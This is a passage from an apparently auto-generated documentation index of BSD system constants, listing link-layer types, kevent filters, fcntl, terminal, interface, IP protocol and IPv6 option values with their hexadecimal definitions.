constant DLT_JUNIPER_CHDLC (line 462) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 463) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 464) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FIBRECHANNEL (line 465) | DLT_JUNIPER_FIBRECHANNEL = 0xea constant DLT_JUNIPER_FRELAY (line 466) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 467) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_ISM (line 468) | DLT_JUNIPER_ISM = 0xc2 constant DLT_JUNIPER_MFR (line 469) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 470) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 471) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 472) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 473) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 474) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 475) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 476) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 477) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_JUNIPER_SRX_E2E (line 478) | DLT_JUNIPER_SRX_E2E = 0xe9 constant DLT_JUNIPER_ST (line 479) | DLT_JUNIPER_ST = 0xc8 constant DLT_JUNIPER_VP (line 480) | DLT_JUNIPER_VP = 0xb7 constant DLT_JUNIPER_VS (line 481) | DLT_JUNIPER_VS = 0xe8 constant DLT_LAPB_WITH_DIR (line 482) | DLT_LAPB_WITH_DIR = 0xcf constant DLT_LAPD (line 483) | DLT_LAPD = 0xcb constant DLT_LIN (line 484) | DLT_LIN = 0xd4 constant DLT_LINUX_EVDEV (line 485) | DLT_LINUX_EVDEV = 0xd8 constant DLT_LINUX_IRDA (line 486) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 487) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_PPP_WITHDIRECTION (line 488) | DLT_LINUX_PPP_WITHDIRECTION = 0xa6 constant DLT_LINUX_SLL (line 489) | DLT_LINUX_SLL = 0x71 constant DLT_LINUX_SLL2 (line 490) | DLT_LINUX_SLL2 = 0x114 constant DLT_LOOP (line 491) | DLT_LOOP = 0x6c constant DLT_LORATAP (line 492) | DLT_LORATAP = 0x10e constant DLT_LTALK (line 493) | DLT_LTALK = 0x72 constant DLT_MATCHING_MAX (line 494) | DLT_MATCHING_MAX = 0x114 constant DLT_MATCHING_MIN (line 495) | DLT_MATCHING_MIN = 0x68 constant DLT_MFR (line 496) | DLT_MFR = 0xb6 constant DLT_MOST (line 497) | DLT_MOST = 0xd3 constant DLT_MPEG_2_TS (line 498) | DLT_MPEG_2_TS = 0xf3 constant DLT_MPLS (line 499) | DLT_MPLS = 0xdb constant DLT_MTP2 (line 500) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 501) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 502) | DLT_MTP3 = 0x8d constant DLT_MUX27010 (line 503) | DLT_MUX27010 = 0xec constant DLT_NETANALYZER (line 504) | DLT_NETANALYZER = 0xf0 constant DLT_NETANALYZER_TRANSPARENT (line 505) | DLT_NETANALYZER_TRANSPARENT = 0xf1 constant DLT_NETLINK (line 506) | DLT_NETLINK = 0xfd constant DLT_NFC_LLCP (line 507) | DLT_NFC_LLCP = 0xf5 constant DLT_NFLOG (line 508) | DLT_NFLOG = 0xef constant DLT_NG40 (line 509) | DLT_NG40 = 0xf4 constant DLT_NORDIC_BLE (line 510) | DLT_NORDIC_BLE = 0x110 constant DLT_NULL (line 511) | DLT_NULL = 0x0 constant DLT_OPENFLOW (line 512) | DLT_OPENFLOW = 0x10b constant DLT_PCI_EXP (line 513) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 514) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 515) | DLT_PFSYNC = 0x79 constant DLT_PKTAP (line 516) | DLT_PKTAP = 0x102 constant DLT_PPI (line 517) | DLT_PPI = 0xc0 constant DLT_PPP (line 518) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 519) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_ETHER (line 520) | DLT_PPP_ETHER = 0x33 constant DLT_PPP_PPPD (line 521) | DLT_PPP_PPPD = 0xa6 constant DLT_PPP_SERIAL (line 522) | DLT_PPP_SERIAL = 0x32 constant DLT_PPP_WITH_DIR (line 523) | DLT_PPP_WITH_DIR = 0xcc constant DLT_PPP_WITH_DIRECTION (line 524) | DLT_PPP_WITH_DIRECTION = 0xa6 constant DLT_PRISM_HEADER (line 525) | DLT_PRISM_HEADER = 0x77 constant DLT_PROFIBUS_DL (line 526) | DLT_PROFIBUS_DL = 0x101 constant DLT_PRONET (line 527) | DLT_PRONET = 0x4 constant DLT_RAIF1 (line 528) | DLT_RAIF1 = 0xc6 constant DLT_RAW (line 529) | DLT_RAW = 0xc constant DLT_RDS (line 530) | DLT_RDS = 0x109 constant DLT_REDBACK_SMARTEDGE (line 531) | DLT_REDBACK_SMARTEDGE = 0x20 constant DLT_RIO (line 532) | DLT_RIO = 0x7c constant DLT_RTAC_SERIAL (line 533) | DLT_RTAC_SERIAL = 0xfa constant DLT_SCCP (line 534) | DLT_SCCP = 0x8e constant DLT_SCTP (line 535) | DLT_SCTP = 0xf8 constant DLT_SDLC (line 536) | DLT_SDLC = 0x10c constant DLT_SITA (line 537) | DLT_SITA = 0xc4 constant DLT_SLIP (line 538) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 539) | DLT_SLIP_BSDOS = 0xd constant DLT_STANAG_5066_D_PDU (line 540) | DLT_STANAG_5066_D_PDU = 0xed constant DLT_SUNATM (line 541) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 542) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TI_LLN_SNIFFER (line 543) | DLT_TI_LLN_SNIFFER = 0x10d constant DLT_TZSP (line 544) | DLT_TZSP = 0x80 constant DLT_USB (line 545) | DLT_USB = 0xba constant DLT_USBPCAP (line 546) | DLT_USBPCAP = 0xf9 constant DLT_USB_DARWIN (line 547) | DLT_USB_DARWIN = 0x10a constant DLT_USB_FREEBSD (line 548) | DLT_USB_FREEBSD = 0xba constant DLT_USB_LINUX (line 549) | DLT_USB_LINUX = 0xbd constant DLT_USB_LINUX_MMAPPED (line 550) | DLT_USB_LINUX_MMAPPED = 0xdc constant DLT_USER0 (line 551) | DLT_USER0 = 0x93 constant DLT_USER1 (line 552) | DLT_USER1 = 0x94 constant DLT_USER10 (line 553) | DLT_USER10 = 0x9d constant DLT_USER11 (line 554) | DLT_USER11 = 0x9e constant DLT_USER12 (line 555) | DLT_USER12 = 0x9f constant DLT_USER13 (line 556) | DLT_USER13 = 0xa0 constant DLT_USER14 (line 557) | DLT_USER14 = 0xa1 constant DLT_USER15 (line 558) | DLT_USER15 = 0xa2 constant DLT_USER2 (line 559) | DLT_USER2 = 0x95 constant DLT_USER3 (line 560) | DLT_USER3 = 0x96 constant DLT_USER4 (line 561) | DLT_USER4 = 0x97 constant DLT_USER5 (line 562) | DLT_USER5 = 0x98 constant DLT_USER6 (line 563) | DLT_USER6 = 0x99 constant DLT_USER7 (line 564) | DLT_USER7 = 0x9a constant DLT_USER8 (line 565) | DLT_USER8 = 0x9b constant DLT_USER9 (line 566) | DLT_USER9 = 0x9c constant DLT_VSOCK (line 567) | DLT_VSOCK = 0x10f constant DLT_WATTSTOPPER_DLM (line 568) | DLT_WATTSTOPPER_DLM = 0x107 constant DLT_WIHART (line 569) | DLT_WIHART = 0xdf constant DLT_WIRESHARK_UPPER_PDU (line 570) | DLT_WIRESHARK_UPPER_PDU = 0xfc constant DLT_X2E_SERIAL (line 571) | DLT_X2E_SERIAL = 0xd5 constant DLT_X2E_XORAYA (line 572) | DLT_X2E_XORAYA = 0xd6 constant DLT_ZWAVE_R1_R2 (line 573) | DLT_ZWAVE_R1_R2 = 0x105 constant DLT_ZWAVE_R3 (line 574) | DLT_ZWAVE_R3 = 0x106 constant DT_BLK (line 575) | DT_BLK = 0x6 constant DT_CHR (line 576) | DT_CHR = 0x2 constant DT_DIR (line 577) | DT_DIR = 0x4 constant DT_FIFO (line 578) | DT_FIFO = 0x1 constant DT_LNK (line 579) | DT_LNK = 0xa constant DT_REG (line 580) | DT_REG = 0x8 constant DT_SOCK (line 581) | DT_SOCK = 0xc constant DT_UNKNOWN (line 582) | DT_UNKNOWN = 0x0 constant DT_WHT (line 583) | DT_WHT = 0xe constant ECHO (line 584) | ECHO = 0x8 constant ECHOCTL (line 585) | ECHOCTL = 0x40 constant ECHOE (line 586) | ECHOE = 0x2 constant ECHOK (line 587) | ECHOK = 0x4 constant ECHOKE (line 588) | ECHOKE = 0x1 constant ECHONL (line 589) | ECHONL = 0x10 constant ECHOPRT (line 590) | ECHOPRT = 0x20 constant EVFILT_AIO (line 591) | EVFILT_AIO = -0x3 constant EVFILT_EMPTY (line 592) | EVFILT_EMPTY = -0xd constant EVFILT_FS (line 593) | EVFILT_FS = -0x9 constant EVFILT_LIO (line 594) | EVFILT_LIO = -0xa constant EVFILT_PROC (line 595) | EVFILT_PROC = -0x5 constant EVFILT_PROCDESC (line 596) | EVFILT_PROCDESC = -0x8 constant EVFILT_READ (line 597) | EVFILT_READ = -0x1 constant EVFILT_SENDFILE (line 598) | EVFILT_SENDFILE = -0xc constant EVFILT_SIGNAL (line 599) | EVFILT_SIGNAL = -0x6 constant EVFILT_SYSCOUNT (line 600) | EVFILT_SYSCOUNT = 0xd constant EVFILT_TIMER (line 601) | EVFILT_TIMER = -0x7 constant EVFILT_USER (line 602) | EVFILT_USER = -0xb constant EVFILT_VNODE (line 603) | EVFILT_VNODE = -0x4 constant EVFILT_WRITE (line 604) | EVFILT_WRITE = -0x2 constant EVNAMEMAP_NAME_SIZE (line 605) | EVNAMEMAP_NAME_SIZE = 0x40 constant EV_ADD (line 606) | EV_ADD = 0x1 constant EV_CLEAR (line 607) | EV_CLEAR = 0x20 constant EV_DELETE (line 608) | EV_DELETE = 0x2 constant EV_DISABLE (line 609) | EV_DISABLE = 0x8 constant EV_DISPATCH (line 610) | EV_DISPATCH = 0x80 constant EV_DROP (line 611) | EV_DROP = 0x1000 constant EV_ENABLE (line 612) | EV_ENABLE = 0x4 constant EV_EOF (line 613) | EV_EOF = 0x8000 constant EV_ERROR (line 614) | EV_ERROR = 0x4000 constant EV_FLAG1 (line 615) | EV_FLAG1 = 0x2000 constant EV_FLAG2 (line 616) | EV_FLAG2 = 0x4000 constant EV_FORCEONESHOT (line 617) | EV_FORCEONESHOT = 0x100 constant EV_ONESHOT (line 618) | EV_ONESHOT = 0x10 constant EV_RECEIPT (line 619) | EV_RECEIPT = 0x40 constant EV_SYSFLAGS (line 620) | EV_SYSFLAGS = 0xf000 constant EXTA (line 621) | EXTA = 0x4b00 constant EXTATTR_MAXNAMELEN (line 622) | EXTATTR_MAXNAMELEN = 0xff constant EXTATTR_NAMESPACE_EMPTY (line 623) | EXTATTR_NAMESPACE_EMPTY = 0x0 constant EXTATTR_NAMESPACE_SYSTEM (line 624) | EXTATTR_NAMESPACE_SYSTEM = 0x2 constant EXTATTR_NAMESPACE_USER (line 625) | EXTATTR_NAMESPACE_USER = 0x1 constant EXTB (line 626) | EXTB = 0x9600 constant EXTPROC (line 627) | EXTPROC = 0x800 constant FD_CLOEXEC (line 628) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 629) | FD_SETSIZE = 0x400 constant FLUSHO (line 630) | FLUSHO = 0x800000 constant F_CANCEL (line 631) | F_CANCEL = 0x5 constant F_DUP2FD (line 632) | F_DUP2FD = 0xa constant F_DUP2FD_CLOEXEC (line 633) | F_DUP2FD_CLOEXEC = 0x12 constant F_DUPFD (line 634) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 635) | F_DUPFD_CLOEXEC = 0x11 constant F_GETFD (line 636) | F_GETFD = 0x1 constant F_GETFL (line 637) | F_GETFL = 0x3 constant F_GETLK (line 638) | F_GETLK = 0xb constant F_GETOWN (line 639) | F_GETOWN = 0x5 constant F_OGETLK (line 640) | F_OGETLK = 0x7 constant F_OK (line 641) | F_OK = 0x0 constant F_OSETLK (line 642) | F_OSETLK = 0x8 constant F_OSETLKW (line 643) | F_OSETLKW = 0x9 constant F_RDAHEAD (line 644) | F_RDAHEAD = 0x10 constant F_RDLCK (line 645) | F_RDLCK = 0x1 constant F_READAHEAD (line 646) | F_READAHEAD = 0xf constant F_SETFD (line 647) | F_SETFD = 0x2 constant F_SETFL (line 648) | F_SETFL = 0x4 constant F_SETLK (line 649) | F_SETLK = 0xc constant F_SETLKW (line 650) | F_SETLKW = 0xd constant F_SETLK_REMOTE (line 651) | F_SETLK_REMOTE = 0xe constant F_SETOWN (line 652) | F_SETOWN = 0x6 constant F_UNLCK (line 653) | F_UNLCK = 0x2 constant F_UNLCKSYS (line 654) | F_UNLCKSYS = 0x4 constant F_WRLCK (line 655) | F_WRLCK = 0x3 constant HUPCL (line 656) | HUPCL = 0x4000 constant HW_MACHINE (line 657) | HW_MACHINE = 0x1 constant ICANON (line 658) | ICANON = 0x100 constant ICMP6_FILTER (line 659) | ICMP6_FILTER = 0x12 constant ICRNL (line 660) | ICRNL = 0x100 constant IEXTEN (line 661) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 662) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 663) | IFAN_DEPARTURE = 0x1 constant IFCAP_WOL_MAGIC (line 664) | IFCAP_WOL_MAGIC = 0x2000 constant IFF_ALLMULTI (line 665) | IFF_ALLMULTI = 0x200 constant IFF_ALTPHYS (line 666) | IFF_ALTPHYS = 0x4000 constant IFF_BROADCAST (line 667) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 668) | IFF_CANTCHANGE = 0x218f52 constant IFF_CANTCONFIG (line 669) | IFF_CANTCONFIG = 0x10000 constant IFF_DEBUG (line 670) | IFF_DEBUG = 0x4 constant IFF_DRV_OACTIVE (line 671) | IFF_DRV_OACTIVE = 0x400 constant IFF_DRV_RUNNING (line 672) | IFF_DRV_RUNNING = 0x40 constant IFF_DYING (line 673) | IFF_DYING = 0x200000 constant IFF_LINK0 (line 674) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 675) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 676) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 677) | IFF_LOOPBACK = 0x8 constant IFF_MONITOR (line 678) | IFF_MONITOR = 0x40000 constant IFF_MULTICAST (line 679) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 680) | IFF_NOARP = 0x80 constant IFF_NOGROUP (line 681) | IFF_NOGROUP = 0x800000 constant IFF_OACTIVE (line 682) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 683) | IFF_POINTOPOINT = 0x10 constant IFF_PPROMISC (line 684) | IFF_PPROMISC = 0x20000 constant IFF_PROMISC (line 685) | IFF_PROMISC = 0x100 constant IFF_RENAMING (line 686) | IFF_RENAMING = 0x400000 constant IFF_RUNNING (line 687) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 688) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 689) | IFF_STATICARP = 0x80000 constant IFF_UP (line 690) | IFF_UP = 0x1 constant IFNAMSIZ (line 691) | IFNAMSIZ = 0x10 constant IFT_BRIDGE (line 692) | IFT_BRIDGE = 0xd1 constant IFT_CARP (line 693) | IFT_CARP = 0xf8 constant IFT_IEEE1394 (line 694) | IFT_IEEE1394 = 0x90 constant IFT_INFINIBAND (line 695) | IFT_INFINIBAND = 0xc7 constant IFT_L2VLAN (line 696) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 697) | IFT_L3IPVLAN = 0x88 constant IFT_PPP (line 698) | IFT_PPP = 0x17 constant IFT_PROPVIRTUAL (line 699) | IFT_PROPVIRTUAL = 0x35 constant IGNBRK (line 700) | IGNBRK = 0x1 constant IGNCR (line 701) | IGNCR = 0x80 constant IGNPAR (line 702) | IGNPAR = 0x4 constant IMAXBEL (line 703) | IMAXBEL = 0x2000 constant INLCR (line 704) | INLCR = 0x40 constant INPCK (line 705) | INPCK = 0x10 constant IN_CLASSA_HOST (line 706) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 707) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 708) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 709) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 710) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 711) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 712) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 713) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 714) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 715) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 716) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 717) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 718) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 719) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 720) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_MASK (line 721) | IN_RFC3021_MASK = 0xfffffffe constant IPPROTO_3PC (line 722) | IPPROTO_3PC = 0x22 constant IPPROTO_ADFS (line 723) | IPPROTO_ADFS = 0x44 constant IPPROTO_AH (line 724) | IPPROTO_AH = 0x33 constant IPPROTO_AHIP (line 725) | IPPROTO_AHIP = 0x3d constant IPPROTO_APES (line 726) | IPPROTO_APES = 0x63 constant IPPROTO_ARGUS (line 727) | IPPROTO_ARGUS = 0xd constant IPPROTO_AX25 (line 728) | IPPROTO_AX25 = 0x5d constant IPPROTO_BHA (line 729) | IPPROTO_BHA = 0x31 constant IPPROTO_BLT (line 730) | IPPROTO_BLT = 0x1e constant IPPROTO_BRSATMON (line 731) | IPPROTO_BRSATMON = 0x4c constant IPPROTO_CARP (line 732) | IPPROTO_CARP = 0x70 constant IPPROTO_CFTP (line 733) | IPPROTO_CFTP = 0x3e constant IPPROTO_CHAOS (line 734) | IPPROTO_CHAOS = 0x10 constant IPPROTO_CMTP (line 735) | IPPROTO_CMTP = 0x26 constant IPPROTO_CPHB (line 736) | IPPROTO_CPHB = 0x49 constant IPPROTO_CPNX (line 737) | IPPROTO_CPNX = 0x48 constant IPPROTO_DCCP (line 738) | IPPROTO_DCCP = 0x21 constant IPPROTO_DDP (line 739) | IPPROTO_DDP = 0x25 constant IPPROTO_DGP (line 740) | IPPROTO_DGP = 0x56 constant IPPROTO_DIVERT (line 741) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 742) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 743) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 744) | IPPROTO_EGP = 0x8 constant IPPROTO_EMCON (line 745) | IPPROTO_EMCON = 0xe constant IPPROTO_ENCAP (line 746) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 747) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 748) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 749) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 750) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 751) | IPPROTO_GGP = 0x3 constant IPPROTO_GMTP (line 752) | IPPROTO_GMTP = 0x64 constant IPPROTO_GRE (line 753) | IPPROTO_GRE = 0x2f constant IPPROTO_HELLO (line 754) | IPPROTO_HELLO = 0x3f constant IPPROTO_HIP (line 755) | IPPROTO_HIP = 0x8b constant IPPROTO_HMP (line 756) | IPPROTO_HMP = 0x14 constant IPPROTO_HOPOPTS (line 757) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 758) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 759) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 760) | IPPROTO_IDP = 0x16 constant IPPROTO_IDPR (line 761) | IPPROTO_IDPR = 0x23 constant IPPROTO_IDRP (line 762) | IPPROTO_IDRP = 0x2d constant IPPROTO_IGMP (line 763) | IPPROTO_IGMP = 0x2 constant IPPROTO_IGP (line 764) | IPPROTO_IGP = 0x55 constant IPPROTO_IGRP (line 765) | IPPROTO_IGRP = 0x58 constant IPPROTO_IL (line 766) | IPPROTO_IL = 0x28 constant IPPROTO_INLSP (line 767) | IPPROTO_INLSP = 0x34 constant IPPROTO_INP (line 768) | IPPROTO_INP = 0x20 constant IPPROTO_IP (line 769) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 770) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPCV (line 771) | IPPROTO_IPCV = 0x47 constant IPPROTO_IPEIP (line 772) | IPPROTO_IPEIP = 0x5e constant IPPROTO_IPIP (line 773) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPPC (line 774) | IPPROTO_IPPC = 0x43 constant IPPROTO_IPV4 (line 775) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 776) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IRTP (line 777) | IPPROTO_IRTP = 0x1c constant IPPROTO_KRYPTOLAN (line 778) | IPPROTO_KRYPTOLAN = 0x41 constant IPPROTO_LARP (line 779) | IPPROTO_LARP = 0x5b constant IPPROTO_LEAF1 (line 780) | IPPROTO_LEAF1 = 0x19 constant IPPROTO_LEAF2 (line 781) | IPPROTO_LEAF2 = 0x1a constant IPPROTO_MAX (line 782) | IPPROTO_MAX = 0x100 constant IPPROTO_MEAS (line 783) | IPPROTO_MEAS = 0x13 constant IPPROTO_MH (line 784) | IPPROTO_MH = 0x87 constant IPPROTO_MHRP (line 785) | IPPROTO_MHRP = 0x30 constant IPPROTO_MICP (line 786) | IPPROTO_MICP = 0x5f constant IPPROTO_MOBILE (line 787) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 788) | IPPROTO_MPLS = 0x89 constant IPPROTO_MTP (line 789) | IPPROTO_MTP = 0x5c constant IPPROTO_MUX (line 790) | IPPROTO_MUX = 0x12 constant IPPROTO_ND (line 791) | IPPROTO_ND = 0x4d constant IPPROTO_NHRP (line 792) | IPPROTO_NHRP = 0x36 constant IPPROTO_NONE (line 793) | IPPROTO_NONE = 0x3b constant IPPROTO_NSP (line 794) | IPPROTO_NSP = 0x1f constant IPPROTO_NVPII (line 795) | IPPROTO_NVPII = 0xb constant IPPROTO_OLD_DIVERT (line 796) | IPPROTO_OLD_DIVERT = 0xfe constant IPPROTO_OSPFIGP (line 797) | IPPROTO_OSPFIGP = 0x59 constant IPPROTO_PFSYNC (line 798) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PGM (line 799) | IPPROTO_PGM = 0x71 constant IPPROTO_PIGP (line 800) | IPPROTO_PIGP = 0x9 constant IPPROTO_PIM (line 801) | IPPROTO_PIM = 0x67 constant IPPROTO_PRM (line 802) | IPPROTO_PRM = 0x15 constant IPPROTO_PUP (line 803) | IPPROTO_PUP = 0xc constant IPPROTO_PVP (line 804) | IPPROTO_PVP = 0x4b constant IPPROTO_RAW (line 805) | IPPROTO_RAW = 0xff constant IPPROTO_RCCMON (line 806) | IPPROTO_RCCMON = 0xa constant IPPROTO_RDP (line 807) | IPPROTO_RDP = 0x1b constant IPPROTO_RESERVED_253 (line 808) | IPPROTO_RESERVED_253 = 0xfd constant IPPROTO_RESERVED_254 (line 809) | IPPROTO_RESERVED_254 = 0xfe constant IPPROTO_ROUTING (line 810) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 811) | IPPROTO_RSVP = 0x2e constant IPPROTO_RVD (line 812) | IPPROTO_RVD = 0x42 constant IPPROTO_SATEXPAK (line 813) | IPPROTO_SATEXPAK = 0x40 constant IPPROTO_SATMON (line 814) | IPPROTO_SATMON = 0x45 constant IPPROTO_SCCSP (line 815) | IPPROTO_SCCSP = 0x60 constant IPPROTO_SCTP (line 816) | IPPROTO_SCTP = 0x84 constant IPPROTO_SDRP (line 817) | IPPROTO_SDRP = 0x2a constant IPPROTO_SEND (line 818) | IPPROTO_SEND = 0x103 constant IPPROTO_SHIM6 (line 819) | IPPROTO_SHIM6 = 0x8c constant IPPROTO_SKIP (line 820) | IPPROTO_SKIP = 0x39 constant IPPROTO_SPACER (line 821) | IPPROTO_SPACER = 0x7fff constant IPPROTO_SRPC (line 822) | IPPROTO_SRPC = 0x5a constant IPPROTO_ST (line 823) | IPPROTO_ST = 0x7 constant IPPROTO_SVMTP (line 824) | IPPROTO_SVMTP = 0x52 constant IPPROTO_SWIPE (line 825) | IPPROTO_SWIPE = 0x35 constant IPPROTO_TCF (line 826) | IPPROTO_TCF = 0x57 constant IPPROTO_TCP (line 827) | IPPROTO_TCP = 0x6 constant IPPROTO_TLSP (line 828) | IPPROTO_TLSP = 0x38 constant IPPROTO_TP (line 829) | IPPROTO_TP = 0x1d constant IPPROTO_TPXX (line 830) | IPPROTO_TPXX = 0x27 constant IPPROTO_TRUNK1 (line 831) | IPPROTO_TRUNK1 = 0x17 constant IPPROTO_TRUNK2 (line 832) | IPPROTO_TRUNK2 = 0x18 constant IPPROTO_TTP (line 833) | IPPROTO_TTP = 0x54 constant IPPROTO_UDP (line 834) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 835) | IPPROTO_UDPLITE = 0x88 constant IPPROTO_VINES (line 836) | IPPROTO_VINES = 0x53 constant IPPROTO_VISA (line 837) | IPPROTO_VISA = 0x46 constant IPPROTO_VMTP (line 838) | IPPROTO_VMTP = 0x51 constant IPPROTO_WBEXPAK (line 839) | IPPROTO_WBEXPAK = 0x4f constant IPPROTO_WBMON (line 840) | IPPROTO_WBMON = 0x4e constant IPPROTO_WSN (line 841) | IPPROTO_WSN = 0x4a constant IPPROTO_XNET (line 842) | IPPROTO_XNET = 0xf constant IPPROTO_XTP (line 843) | IPPROTO_XTP = 0x24 constant IPV6_AUTOFLOWLABEL (line 844) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_BINDANY (line 845) | IPV6_BINDANY = 0x40 constant IPV6_BINDMULTI (line 846) | IPV6_BINDMULTI = 0x41 constant IPV6_BINDV6ONLY (line 847) | IPV6_BINDV6ONLY = 0x1b constant IPV6_CHECKSUM (line 848) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 849) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 850) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 851) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 852) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 853) | IPV6_DSTOPTS = 0x32 constant IPV6_FLOWID (line 854) | IPV6_FLOWID = 0x43 constant IPV6_FLOWINFO_MASK (line 855) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_LEN (line 856) | IPV6_FLOWLABEL_LEN = 0x14 constant IPV6_FLOWLABEL_MASK (line 857) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FLOWTYPE (line 858) | IPV6_FLOWTYPE = 0x44 constant IPV6_FRAGTTL (line 859) | IPV6_FRAGTTL = 0x78 constant IPV6_FW_ADD (line 860) | IPV6_FW_ADD = 0x1e constant IPV6_FW_DEL (line 861) | IPV6_FW_DEL = 0x1f constant IPV6_FW_FLUSH (line 862) | IPV6_FW_FLUSH = 0x20 constant IPV6_FW_GET (line 863) | IPV6_FW_GET = 0x22 constant IPV6_FW_ZERO (line 864) | IPV6_FW_ZERO = 0x21 constant IPV6_HLIMDEC (line 865) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 866) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 867) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 868) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 869) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 870) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 871) | IPV6_MAXHLIM = 0xff constant IPV6_MAXOPTHDR (line 872) | IPV6_MAXOPTHDR = 0x800 constant IPV6_MAXPACKET (line 873) | IPV6_MAXPACKET = 0xffff constant IPV6_MAX_GROUP_SRC_FILTER (line 874) | IPV6_MAX_GROUP_SRC_FILTER = 0x200 constant IPV6_MAX_MEMBERSHIPS (line 875) | IPV6_MAX_MEMBERSHIPS = 0xfff constant IPV6_MAX_SOCK_SRC_FILTER (line 876) | IPV6_MAX_SOCK_SRC_FILTER = 0x80 constant IPV6_MMTU (line 877) | IPV6_MMTU = 0x500 constant IPV6_MSFILTER (line 878) | IPV6_MSFILTER = 0x4a constant IPV6_MULTICAST_HOPS (line 879) | IPV6_MULTICAST_HOPS = 0xa constant 